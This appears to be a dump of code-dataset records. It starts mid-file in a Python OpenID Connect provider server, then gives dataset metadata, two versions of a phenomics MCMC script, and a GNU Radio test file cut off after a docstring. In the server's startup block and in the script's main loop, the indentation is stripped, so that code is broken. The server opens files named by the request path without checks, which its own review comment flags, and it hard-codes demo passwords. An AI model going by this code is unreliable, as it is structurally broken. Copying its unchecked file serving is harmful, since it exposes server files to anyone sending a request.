hdlr.setFormatter(base_formatter)
LOGGER.addHandler(hdlr)
LOGGER.setLevel(logging.DEBUG)
logger = logging.getLogger('oicServer')
def static_file(path):
    """Return True when *path* names an existing filesystem entry.

    Uses ``os.stat`` so that broken symlinks / permission problems on the
    parent directory also count as "not servable" (OSError -> False).
    """
    try:
        os.stat(path)
    except OSError:
        return False
    return True
# noinspection PyUnresolvedReferences
def static(self, environ, start_response, path):
    """Serve the file at *path* as a WSGI response.

    :param self: unused; kept so the function matches the bound-method
        call signature used by ``Application`` (TODO confirm callers).
    :param environ: WSGI environment dict.
    :param start_response: WSGI start_response callable.
    :param path: filesystem path of the file to serve.
    :return: list with the file bytes, or a NotFound response when the
        file cannot be read.
    """
    logger.info("[static]sending: %s" % (path,))
    # Content-Type per file suffix; anything unrecognised falls back to
    # text/xml, matching the original elif chain.
    content_types = {
        ".ico": "image/x-icon",
        ".html": "text/html",
        ".json": "application/json",
        ".txt": "text/plain",
        ".css": "text/css",
    }
    try:
        # ``with`` guarantees the handle is closed; the original left
        # the file object open until garbage collection.
        with open(path, 'rb') as fh:
            data = fh.read()
    except IOError:
        resp = NotFound()
        return resp(environ, start_response)
    for suffix, ctype in content_types.items():
        if path.endswith(suffix):
            break
    else:
        ctype = "text/xml"
    start_response('200 OK', [('Content-Type', ctype)])
    return [data]
def check_session_iframe(self, environ, start_response, logger):
    # Serve the OP session-management iframe page via the static() helper.
    # NOTE(review): the ``logger`` parameter shadows the module-level logger
    # and is unused here — presumably kept for a uniform handler signature;
    # confirm against the URL dispatch table before removing.
    return static(self, environ, start_response, "htdocs/op_session_iframe.html")
def key_rollover(self, environ, start_response, _):
    """Perform a provider key rollover from a POSTed JWKS document.

    Reads the request body as JSON, asks the module-level ``provider`` to
    roll its keys, persists the resulting public JWKS to ``jwksFileName``
    and answers "OK".

    :param self: unused; kept for handler-signature compatibility.
    :param _: unused positional slot from the URL dispatcher.
    """
    # expects a post containing the necessary information
    _txt = get_post(environ)
    _jwks = json.loads(_txt)
    provider.do_key_rollover(_jwks, "key_%d_%%d" % int(time.time()))
    # Dump the refreshed JWKS to file; ``with`` closes the handle even if
    # the write raises (the original leaked the file object in that case).
    with open(jwksFileName, "w") as f:
        f.write(json.dumps(provider.keyjar.export_jwks()))
    resp = Response("OK")
    return resp(environ, start_response)
def clear_keys(self, environ, start_response, _):
    # Drop keys the module-level ``provider`` has marked inactive, then ACK.
    # ``self`` and ``_`` are unused — kept for handler-signature uniformity.
    provider.remove_inactive_keys()
    resp = Response("OK")
    return resp(environ, start_response)
class Application(object):
    """WSGI application that routes requests to the OIDC provider.

    Wires the provider's protocol endpoints (authorization, token,
    userinfo, registration, end-session) plus discovery/webfinger and a
    few maintenance handlers into a regex -> callable dispatch table that
    ``application`` walks for every request.
    """
    def __init__(self, provider, urls):
        """Build the dispatch table.

        :param provider: configured ``oic`` Provider instance.
        :param urls: list of (regex, handler) pairs; extended in place.
        """
        self.provider = provider
        self.endpoints = [
            AuthorizationEndpoint(self.authorization),
            TokenEndpoint(self.token),
            UserinfoEndpoint(self.userinfo),
            RegistrationEndpoint(self.registration),
            EndSessionEndpoint(self.endsession),
        ]
        self.provider.endp = self.endpoints
        self.urls = urls
        self.urls.extend([
            (r'^.well-known/openid-configuration', self.op_info),
            (r'^.well-known/simple-web-discovery', self.swd_info),
            (r'^.well-known/host-meta.json', self.meta_info),
            (r'^.well-known/webfinger', self.webfinger),
            (r'.+\.css$', self.css),
            (r'safe', self.safe),
            (r'^keyrollover', key_rollover),
            (r'^clearkeys', clear_keys),
            (r'^check_session', check_session_iframe)
        ])
        # One route per protocol endpoint, anchored at the path start.
        for endp in self.endpoints:
            self.urls.append(("^%s" % endp.etype, endp.func))
    # noinspection PyUnusedLocal
    def safe(self, environ, start_response):
        """Demo bearer-token-protected resource: echoes the session subject."""
        _srv = self.provider.server
        _log_info = self.provider.logger.info
        _log_info("- safe -")
        try:
            authz = environ["HTTP_AUTHORIZATION"]
            (typ, code) = authz.split(" ")
        except KeyError:
            resp = BadRequest("Missing authorization information")
            return resp(environ, start_response)
        else:
            if typ != "Bearer":
                resp = BadRequest("Unsupported authorization method")
                return resp(environ, start_response)
        try:
            # Look the access token up in the session DB.
            _sinfo = _srv.sdb[code]
        except KeyError:
            resp = Unauthorized("Not authorized")
            return resp(environ, start_response)
        info = "'%s' secrets" % _sinfo["sub"]
        resp = Response(info)
        return resp(environ, start_response)
    # noinspection PyUnusedLocal
    def css(self, environ, start_response):
        """Serve a stylesheet straight from PATH_INFO.

        NOTE(review): the file handle from ``open()`` is never closed —
        consider a ``with`` block. PATH_INFO is also used as a filesystem
        path unchecked; confirm this is only reachable for trusted paths.
        """
        try:
            info = open(environ["PATH_INFO"]).read()
            resp = Response(info)
        except (OSError, IOError):
            resp = NotFound(environ["PATH_INFO"])
        return resp(environ, start_response)
    # noinspection PyUnusedLocal
    def token(self, environ, start_response):
        """Delegate to the provider's token endpoint."""
        return wsgi_wrapper(environ, start_response, self.provider.token_endpoint,
                            logger=logger)
    # noinspection PyUnusedLocal
    def authorization(self, environ, start_response):
        """Delegate to the provider's authorization endpoint."""
        return wsgi_wrapper(environ, start_response,
                            self.provider.authorization_endpoint, logger=logger)  # cookies required.
    # noinspection PyUnusedLocal
    def userinfo(self, environ, start_response):
        """Delegate to the provider's userinfo endpoint."""
        return wsgi_wrapper(environ, start_response, self.provider.userinfo_endpoint,
                            logger=logger)
    # noinspection PyUnusedLocal
    def op_info(self, environ, start_response):
        """Serve the OpenID Provider configuration (discovery) document."""
        return wsgi_wrapper(environ, start_response,
                            self.provider.providerinfo_endpoint, logger=logger)
    # noinspection PyUnusedLocal
    def registration(self, environ, start_response):
        """Dynamic client registration: POST registers, GET reads back."""
        if environ["REQUEST_METHOD"] == "POST":
            return wsgi_wrapper(environ, start_response,
                                self.provider.registration_endpoint,
                                logger=logger)
        elif environ["REQUEST_METHOD"] == "GET":
            return wsgi_wrapper(environ, start_response,
                                self.provider.read_registration, logger=logger)
        else:
            resp = ServiceError("Method not supported")
            return resp(environ, start_response)
    # noinspection PyUnusedLocal
    def check_id(self, environ, start_response):
        """Delegate to the provider's check_id endpoint (not routed by default)."""
        return wsgi_wrapper(environ, start_response, self.provider.check_id_endpoint,
                            logger=logger)
    # noinspection PyUnusedLocal
    def swd_info(self, environ, start_response):
        """Simple Web Discovery endpoint."""
        return wsgi_wrapper(environ, start_response, self.provider.discovery_endpoint,
                            logger=logger)
    # noinspection PyUnusedLocal
    def trace_log(self, environ, start_response):
        """Expose the provider's trace log (not routed by default)."""
        return wsgi_wrapper(environ, start_response, self.provider.tracelog_endpoint,
                            logger=logger)
    # noinspection PyUnusedLocal
    def endsession(self, environ, start_response):
        """Delegate to the provider's end-session (logout) endpoint."""
        return wsgi_wrapper(environ, start_response,
                            self.provider.endsession_endpoint, logger=logger)
    # noinspection PyUnusedLocal
    def meta_info(self, environ, start_response):
        """host-meta.json handler — currently a stub.

        Intended to return something like::

            {"links":[
                {
                   "rel":"http://openid.net/specs/connect/1.0/issuer",
                   "href":"https://openidconnect.info/"
                }
            ]}

        NOTE(review): the body only prints and returns None, which is not
        a valid WSGI response — requests matching host-meta.json will
        fail downstream.
        """
        print('\n in meta-info')
        pass
    def webfinger(self, environ, start_response):
        """RFC 7033 WebFinger endpoint used for OIDC issuer discovery."""
        query = parse_qs(environ["QUERY_STRING"])
        try:
            rel = query["rel"]
            resource = query["resource"][0]
        except KeyError:
            resp = BadRequest("Missing parameter in request")
        else:
            # Only the OIDC issuer relation is answered.
            if rel != [OIC_ISSUER]:
                resp = BadRequest("Bad issuer in request")
            else:
                wf = WebFinger()
                resp = Response(wf.response(subject=resource,
                                            base=self.provider.baseurl))
        return resp(environ, start_response)
    def application(self, environ, start_response):
        """
        The main WSGI application. Dispatch the current request to
        the functions from above and store the regular expression
        captures in the WSGI environment as `oic.url_args` so that
        the functions from above can access the url placeholders.
        If nothing matches call the `not_found` function.
        :param environ: The HTTP application environment
        :param start_response: The application to run when the handling of the
        request is done
        :return: The response as a list of lines
        """
        path = environ.get('PATH_INFO', '').lstrip('/')
        # NOTE(review): debug print left in; consider logger.debug instead.
        print('start_response: ', start_response)
        if path == "robots.txt":
            return static(self, environ, start_response, "static/robots.txt")
        environ["oic.oas"] = self.provider
        if path.startswith("static/"):
            return static(self, environ, start_response, path)
        # First matching route wins; table order is therefore load-bearing.
        for regex, callback in self.urls:
            match = re.search(regex, path)
            if match is not None:
                try:
                    # First capture group, or the whole path if the
                    # pattern has no groups.
                    environ['oic.url_args'] = match.groups()[0]
                except IndexError:
                    environ['oic.url_args'] = path
                try:
                    return callback(environ, start_response)
                except Exception as err:
                    print("%s" % err)
                    message = traceback.format_exception(*sys.exc_info())
                    print(message)
                    logger.exception("%s" % err)
                    resp = ServiceError("%s" % err)
                    return resp(environ, start_response)
        LOGGER.debug("unknown side: %s" % path)
        resp = NotFound("Couldn't find the side you asked for!")
        return resp(environ, start_response)
if __name__ == '__main__':
root = './'
lookup = TemplateLookup(directories=[root + 'Templates', root + 'htdocs'],
module_directory=root + 'modules',
input_encoding='utf-8', output_encoding='utf-8')
def mako_renderer(template_name, context):
mte = lookup.get_template(template_name)
return mte.render(**context)
usernamePasswords = {
"user1": "1",
"user2": "2"
}
passwordEndPointIndex = 0 # what is this, and what does its value mean?
# JWKS: JSON Web Key
jwksFileName = "static/jwks.json"
# parse the parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', dest='config')
parser.add_argument('-d', dest='debug', action='store_true')
args = parser.parse_args()
# parse and setup configuration
config = importlib.import_module(args.config)
config.ISSUER = config.ISSUER + ':{}/'.format(config.PORT)
config.SERVICEURL = config.SERVICEURL.format(issuer=config.ISSUER)
endPoints = config.AUTHENTICATION["UserPassword"]["EndPoints"]
fullEndPointsPath = ["%s%s" % (config.ISSUER, ep) for ep in endPoints]
# TODO: why this instantiation happens so early? can I move it later?
# An OIDC Authorization/Authentication server is designed to
# allow more than one authentication method to be used by the server.
# And that is what the AuthBroker is for.
# Given information about the authorisation request, the AuthBroker
# chooses which method(s) to be used for authenticating the person/entity.
# According to the OIDC standard a Relaying Party can say
# 'I want this type of authentication', and the AuthnBroker tries to pick
# methods from the set it has been supplied, to map that request.
authnBroker = AuthnBroker()
# UsernamePasswordMako: authenticas a user using the username/password form in a
# WSGI environment using Mako as template system
usernamePasswordAuthn = UsernamePasswordMako(
None, # server instance
"login.mako", # a mako template
lookup, # lookup template
usernamePasswords, # username/password dictionary-like database
"%sauthorization" % config.ISSUER, # where to send the user after authentication
None, # templ_arg_func ??!!
fullEndPointsPath) # verification endpoints
# AuthnIndexedEndpointWrapper is a wrapper class for using an authentication module with multiple endpoints.
authnIndexedEndPointWrapper = AuthnIndexedEndpointWrapper(usernamePasswordAuthn, passwordEndPointIndex)
authnBroker.add(config.AUTHENTICATION["UserPassword"]["ACR"], # (?!)
authnIndexedEndPointWrapper, # (?!) method: an identifier of the authentication method.
config.AUTHENTICATION["UserPassword"]["WEIGHT"], # security level
"") # (?!) authentication authority
# ?!
authz = AuthzHandling()
clientDB = shelve_wrapper.open(config.CLIENTDB)
# In-Memory non-persistent SessionDB issuing DefaultTokens
sessionDB = create_session_db(config.ISSUER,
secret=rndstr(32),
password=rndstr(32))
provider = Provider(
name=config.ISSUER, # name
sdb=sessionDB, # session database.
cdb=clientDB, # client database
authn_broker=authnBroker, # authn broker
userinfo=None, # user information
authz=authz, # authz
client_authn=verify_client, # client authentication
symkey=config.SYM_KEY, # Used for Symmetric key authentication
# urlmap = None, # ?
# keyjar = None, # ?
# hostname = "", # ?
template_renderer=mako_renderer, # Rendering custom templates
# verify_ssl = True, # Enable SSL certs
# capabilities = None, # ?
# schema = OpenIDSchema, # ?
# jwks_uri = '', # ?
# jwks_name = '', # ?
baseurl=config.ISSUER,
# client_cert = None # ?
)
# SessionDB:
# This is database where the provider keeps information about
# the authenticated/authorised users. It includes information
# such as "what has been asked for (claims, scopes, and etc. )"
# and "the state of the session". There is one entry in the
# database per person
#
# __________ Note __________
# provider.keyjar is an interesting parameter,
# currently it uses default values, but
# if you have time, it worth investigating.
for authnIndexedEndPointWrapper in authnBroker:
authnIndexedEndPointWrapper.srv = provider
# TODO: this is a point to consider: what if user data in a database?
if config.USERINFO == "SIMPLE":
provider.userinfo = UserInfo(config.USERDB)
provider.cookie_ttl = config.COOKIETTL
provider.cookie_name = config.COOKIENAME
if args.debug:
provider.debug = True
try:
# JWK: JSON Web Key
# JWKS: is a dictionary of JWK
# __________ NOTE __________
# JWKS contains private key information.
#
# keyjar_init configures cryptographic key
# based on the provided configuration "keys".
jwks = keyjar_init(
provider, # server/client instance
config.keys, # key configuration
kid_template="op%d") # template by which to build the kids (key ID parameter)
except Exception as err:
# LOGGER.error("Key setup failed: %s" % err)
provider.key_setup("static", sig={"format": "jwk", "alg": "rsa"})
else:
for key in jwks["keys"]:
for k in key.keys():
key[k] = as_unicode(key[k])
f = open(jwksFileName, "w")
f.write(json.dumps(jwks))
f.close()
provider.jwks_uri = "%s%s" % (provider.baseurl, jwksFileName)
# for b in OAS.keyjar[""]:
# LOGGER.info("OC3 server keys: %s" % b)
# TODO: Questions:
# END_POINT is defined as a dictionary in the configuration file,
# why not defining it as string with "verify" value?
# after all, we have only one end point.
# can we have multiple end points for password? why?
endPoint = config.AUTHENTICATION["UserPassword"]["EndPoints"][passwordEndPointIndex]
_urls = []
_urls.append((r'^' + endPoint, make_auth_verify(authnIndexedEndPointWrapper.verify)))
_app = Application(provider, _urls)
# Setup the web server
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', config.PORT), _app.application) # nosec
server.ssl_adapter = BuiltinSSLAdapter(config.SERVER_CERT, config.SERVER_KEY)
print("OIDC Provider server started (issuer={}, port={})".format(config.ISSUER, config.PORT))
try:
server.start()
except KeyboardInterrupt:
server.stop()
| 6,234 | 2,979 | 164 |
7eae67215162eb3733569a02295ab225f4a06ab6 | 8,636 | py | Python | tools/phenomics/gol_blood/gol_blood.py | skitchen19/galaxy_tools | b935f36cfe430263564503ebb71f78dc79315acb | [
"MIT"
] | 3 | 2017-04-05T18:01:59.000Z | 2019-05-03T14:15:31.000Z | tools/phenomics/gol_blood/gol_blood.py | skitchen19/galaxy_tools | b935f36cfe430263564503ebb71f78dc79315acb | [
"MIT"
] | 6 | 2019-02-27T15:45:58.000Z | 2021-01-12T15:18:50.000Z | tools/phenomics/gol_blood/gol_blood.py | skitchen19/galaxy_tools | b935f36cfe430263564503ebb71f78dc79315acb | [
"MIT"
] | 2 | 2018-10-26T18:36:39.000Z | 2019-01-28T15:12:39.000Z | #!/usr/bin/env python
import argparse
import numpy as np
import os
import data_utils
import mle_sphere
import gen_sphere
import gen_sphere_grid
import gen_r_sig_3d
import gen_selection_in_g_3d
import metrics
import param_ss
import mle_priors_3d
DEFAULT_MLE_SPHERE_PARAM_DICT = dict(xc=0, yc=0, zc=0, r=1, rSig=0.3, xE=1.2, yE=1, zE=0.8)
GRID = np.array([-3, -2, -1, 1, 2, 3])
SCALEFACTOR = 1
parser = argparse.ArgumentParser()
parser.add_argument('--burnin', action='store', dest='burnin', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--input_dir', action='store', dest='input_dir', help='Directory of input csv image point files')
parser.add_argument('--nGrid', action='store', dest='nGrid', type=int, required=False, default=6, help='Not sure')
parser.add_argument('--output_csv_dir', action='store', dest='output_csv_dir', help='Directory to output csv files')
parser.add_argument('--output_json_dir', action='store', dest='output_json_dir', help='Directory to output json files')
parser.add_argument('--output_log', action='store', dest='output_log', help='Output process log file')
parser.add_argument('--plotFigures', action='store', dest='plotFigures', type=bool, required=False, default=False, help='Plot figures')
parser.add_argument('--randomStart', action='store', dest='randomStart', type=bool, required=False, default=True, help='Do not use DEFAULT_MLE_SPHERE_PARAM_DICT')
parser.add_argument("--fixR", action='store', dest='fixR', type=bool, required=False, default=True, help="Not sure")
parser.add_argument('--sample', action='store', dest='sample', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--thin', action='store', dest='thin', type=int, required=False, default=10, help='Not sure')
parser.add_argument('--xTau', action='store', dest='xTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yTau', action='store', dest='yTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zTau', action='store', dest='zTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--rTau', action='store', dest='rTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--xETau', action='store', dest='xETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yETau', action='store', dest='yETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zETau', action='store', dest='zETau', type=float, required=False, default=0.01, help='Not sure')
args = parser.parse_args()
param_dict = get_param_dict(args)
# TODO: nLevelSet = 150
log_fh = open(args.output_log, "w")
for file_name in sorted(os.listdir(args.input_dir)):
file_path = os.path.abspath(os.path.join(args.input_dir, file_name))
# Extract the cell_id from the file name.
cell_id = get_base_file_name(file_name)
# Load or generate synthetic level set data
# if params_dict['genData']:
if False:
# TODO: data = genSphereLevelSet(DEFAULT_MLE_SPHERE_PARAM_DICT, bounding_box, param_dict, nLevelSet)
meanR = [0, 0, 0]
# TODO: save(PrjCtrl.inputFileLevelSetDataM,'data')
else:
data = data_utils.load_raw3d_data(file_path)
log_fh.write("First 5 data points before normalization: {}\n".format(data[:5]))
data, meanR = data_utils.normalize_data(data, log_fh)
log_fh.write("\nFirst 5 data points after normalization: {}\n\n".format(data[:5]))
log_fh.write("mean radius {}".format(meanR))
# TODO: nLevelSet = data.shape[0]
# Set summary parameters
param_ss = param_ss.ParamSS(data.shape[0], meanR)
# Starting value for parameters
if param_dict['randomStart']:
mles_param_dict = mle_sphere.mle_sphere(data, cell_id, param_dict, log_fh)
else:
mles_param_dict = DEFAULT_MLE_SPHERE_PARAM_DICT
# Set Priors
prior = mle_priors_3d.MLEPriors3D(cMean=[mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc']],
cStd=[1, 1, 1],
rMean=mles_param_dict['r'],
rStd=0.1,
eMean=[mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE']],
eStd=[1, 1, 1])
# MCMC Analysis
for n in range(args.burnin + args.sample):
if (np.mod(n, args.thin) == 0 or n == 0):
log_fh.write("\nn {}\n".format(n))
mles_param_dict['cLogLike'] = metrics.calc_log_like_sphere_mix(mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc'],
mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE'],
mles_param_dict['r'],
data[mles_param_dict['sInGIndex'], :],
mles_param_dict['rSig'])
log_fh.write("\nmles_param_dict:\n")
log_fh.write("cLogLike {}\n".format(mles_param_dict['cLogLike']))
log_fh.write("xc {}\n".format(mles_param_dict['xc']))
log_fh.write("yc {}\n".format(mles_param_dict['yc']))
log_fh.write("zc {}\n".format(mles_param_dict['zc']))
log_fh.write("r {}\n".format(mles_param_dict['r']))
log_fh.write("xE {}\n".format(mles_param_dict['xE']))
log_fh.write("yE {}\n".format(mles_param_dict['yE']))
log_fh.write("zE {}\n".format(mles_param_dict['zE']))
log_fh.write("rSig {}\n".format(mles_param_dict['rSig']))
if args.plotFigures:
pass
tup = gen_sphere.gen_sphere(data, mles_param_dict, prior, param_dict)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
tup = gen_sphere_grid.gen_sphere_grid(data, mles_param_dict, prior, param_dict, SCALEFACTOR)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
mles_param_dict['rSig'] = gen_r_sig_3d.gen_r_sig_3d(data, mles_param_dict, prior)
mles_param_dict['sInG'], mles_param_dict['sInGIndex'], mles_param_dict['sOutGIndex'] = gen_selection_in_g_3d.gen_selection_in_g_3d(data, mles_param_dict, prior)
if n > args.burnin:
param_ss.set_params(mles_param_dict)
# param_ss = storeParam3D(ParamSS, param_dict)
log_fh.close()
# Summarize Parameter and print reports
param_ss.summarize_params(args.sample)
param_ss.output_csv(args.output_csv_dir, cell_id)
param_ss.output_json(args.output_json_dir, cell_id)
| 49.919075 | 172 | 0.596225 | #!/usr/bin/env python
import argparse
import numpy as np
import os
import data_utils
import mle_sphere
import gen_sphere
import gen_sphere_grid
import gen_r_sig_3d
import gen_selection_in_g_3d
import metrics
import param_ss
import mle_priors_3d
DEFAULT_MLE_SPHERE_PARAM_DICT = dict(xc=0, yc=0, zc=0, r=1, rSig=0.3, xE=1.2, yE=1, zE=0.8)
GRID = np.array([-3, -2, -1, 1, 2, 3])
SCALEFACTOR = 1
def get_bounding_box_dict():
    """Return the default bounding box: [min, max] = [-2, 2] on x, y and z."""
    return {axis: [-2, 2] for axis in ('x', 'y', 'z')}
def get_base_file_name(file_path):
    """Return the base name of *file_path* with any extension removed.

    ``os.path.splitext`` already leaves extension-less names and leading
    dot-files (e.g. ".hidden") untouched, so the original's explicit
    ``find(".") > 0`` branch was redundant and is dropped.

    :param file_path: path or bare file name.
    :return: base name without its (final) extension.
    """
    return os.path.splitext(os.path.basename(file_path))[0]
def get_param_dict(args):
    """Collect the MCMC tuning options from parsed *args* into a plain dict.

    The sampling grid comes from the module-level ``GRID`` constant; every
    other entry is copied verbatim from the argparse namespace.
    """
    option_names = ('burnin', 'fixR', 'nGrid', 'plotFigures', 'randomStart',
                    'rTau', 'sample', 'thin', 'xETau', 'xTau', 'yETau',
                    'yTau', 'zETau', 'zTau')
    param_dict = {name: getattr(args, name) for name in option_names}
    param_dict['grid'] = GRID
    return param_dict
parser = argparse.ArgumentParser()
parser.add_argument('--burnin', action='store', dest='burnin', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--input_dir', action='store', dest='input_dir', help='Directory of input csv image point files')
parser.add_argument('--nGrid', action='store', dest='nGrid', type=int, required=False, default=6, help='Not sure')
parser.add_argument('--output_csv_dir', action='store', dest='output_csv_dir', help='Directory to output csv files')
parser.add_argument('--output_json_dir', action='store', dest='output_json_dir', help='Directory to output json files')
parser.add_argument('--output_log', action='store', dest='output_log', help='Output process log file')
parser.add_argument('--plotFigures', action='store', dest='plotFigures', type=bool, required=False, default=False, help='Plot figures')
parser.add_argument('--randomStart', action='store', dest='randomStart', type=bool, required=False, default=True, help='Do not use DEFAULT_MLE_SPHERE_PARAM_DICT')
parser.add_argument("--fixR", action='store', dest='fixR', type=bool, required=False, default=True, help="Not sure")
parser.add_argument('--sample', action='store', dest='sample', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--thin', action='store', dest='thin', type=int, required=False, default=10, help='Not sure')
parser.add_argument('--xTau', action='store', dest='xTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yTau', action='store', dest='yTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zTau', action='store', dest='zTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--rTau', action='store', dest='rTau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--xETau', action='store', dest='xETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--yETau', action='store', dest='yETau', type=float, required=False, default=0.01, help='Not sure')
parser.add_argument('--zETau', action='store', dest='zETau', type=float, required=False, default=0.01, help='Not sure')
args = parser.parse_args()
param_dict = get_param_dict(args)
# TODO: nLevelSet = 150
log_fh = open(args.output_log, "w")
for file_name in sorted(os.listdir(args.input_dir)):
file_path = os.path.abspath(os.path.join(args.input_dir, file_name))
# Extract the cell_id from the file name.
cell_id = get_base_file_name(file_name)
# Load or generate synthetic level set data
# if params_dict['genData']:
if False:
# TODO: data = genSphereLevelSet(DEFAULT_MLE_SPHERE_PARAM_DICT, bounding_box, param_dict, nLevelSet)
meanR = [0, 0, 0]
# TODO: save(PrjCtrl.inputFileLevelSetDataM,'data')
else:
data = data_utils.load_raw3d_data(file_path)
log_fh.write("First 5 data points before normalization: {}\n".format(data[:5]))
data, meanR = data_utils.normalize_data(data, log_fh)
log_fh.write("\nFirst 5 data points after normalization: {}\n\n".format(data[:5]))
log_fh.write("mean radius {}".format(meanR))
# TODO: nLevelSet = data.shape[0]
# Set summary parameters
param_ss = param_ss.ParamSS(data.shape[0], meanR)
# Starting value for parameters
if param_dict['randomStart']:
mles_param_dict = mle_sphere.mle_sphere(data, cell_id, param_dict, log_fh)
else:
mles_param_dict = DEFAULT_MLE_SPHERE_PARAM_DICT
# Set Priors
prior = mle_priors_3d.MLEPriors3D(cMean=[mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc']],
cStd=[1, 1, 1],
rMean=mles_param_dict['r'],
rStd=0.1,
eMean=[mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE']],
eStd=[1, 1, 1])
# MCMC Analysis
for n in range(args.burnin + args.sample):
if (np.mod(n, args.thin) == 0 or n == 0):
log_fh.write("\nn {}\n".format(n))
mles_param_dict['cLogLike'] = metrics.calc_log_like_sphere_mix(mles_param_dict['xc'],
mles_param_dict['yc'],
mles_param_dict['zc'],
mles_param_dict['xE'],
mles_param_dict['yE'],
mles_param_dict['zE'],
mles_param_dict['r'],
data[mles_param_dict['sInGIndex'], :],
mles_param_dict['rSig'])
log_fh.write("\nmles_param_dict:\n")
log_fh.write("cLogLike {}\n".format(mles_param_dict['cLogLike']))
log_fh.write("xc {}\n".format(mles_param_dict['xc']))
log_fh.write("yc {}\n".format(mles_param_dict['yc']))
log_fh.write("zc {}\n".format(mles_param_dict['zc']))
log_fh.write("r {}\n".format(mles_param_dict['r']))
log_fh.write("xE {}\n".format(mles_param_dict['xE']))
log_fh.write("yE {}\n".format(mles_param_dict['yE']))
log_fh.write("zE {}\n".format(mles_param_dict['zE']))
log_fh.write("rSig {}\n".format(mles_param_dict['rSig']))
if args.plotFigures:
pass
tup = gen_sphere.gen_sphere(data, mles_param_dict, prior, param_dict)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
tup = gen_sphere_grid.gen_sphere_grid(data, mles_param_dict, prior, param_dict, SCALEFACTOR)
mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
mles_param_dict['rSig'] = gen_r_sig_3d.gen_r_sig_3d(data, mles_param_dict, prior)
mles_param_dict['sInG'], mles_param_dict['sInGIndex'], mles_param_dict['sOutGIndex'] = gen_selection_in_g_3d.gen_selection_in_g_3d(data, mles_param_dict, prior)
if n > args.burnin:
param_ss.set_params(mles_param_dict)
# param_ss = storeParam3D(ParamSS, param_dict)
log_fh.close()
# Summarize Parameter and print reports
param_ss.summarize_params(args.sample)
param_ss.output_csv(args.output_csv_dir, cell_id)
param_ss.output_json(args.output_json_dir, cell_id)
| 1,085 | 0 | 69 |
e8550a5932930f1b2d7a5aff94124ea076b04b7a | 2,208 | py | Python | gnuradio-3.7.13.4/gr-filter/python/filter/qa_hilbert.py | v1259397/cosmic-gnuradio | 64c149520ac6a7d44179c3f4a38f38add45dd5dc | [
"BSD-3-Clause"
] | 1 | 2021-03-09T07:32:37.000Z | 2021-03-09T07:32:37.000Z | gnuradio-3.7.13.4/gr-filter/python/filter/qa_hilbert.py | v1259397/cosmic-gnuradio | 64c149520ac6a7d44179c3f4a38f38add45dd5dc | [
"BSD-3-Clause"
] | null | null | null | gnuradio-3.7.13.4/gr-filter/python/filter/qa_hilbert.py | v1259397/cosmic-gnuradio | 64c149520ac6a7d44179c3f4a38f38add45dd5dc | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, filter, blocks
import math
if __name__ == '__main__':
gr_unittest.run(test_hilbert, "test_hilbert.xml")
| 30.246575 | 73 | 0.658967 | #!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, filter, blocks
import math
def sig_source_f(samp_rate, freq, amp, N):
    """Return N samples of a unit-amplitude sine wave.

    Args:
        samp_rate: sampling rate in Hz.
        freq: sine frequency in Hz.
        amp: accepted for interface compatibility but unused by the
            original implementation (output amplitude is always 1.0).
        N: number of samples to generate.

    Returns:
        list[float] of sin(2*pi*freq*i/samp_rate) for i in 0..N-1.
    """
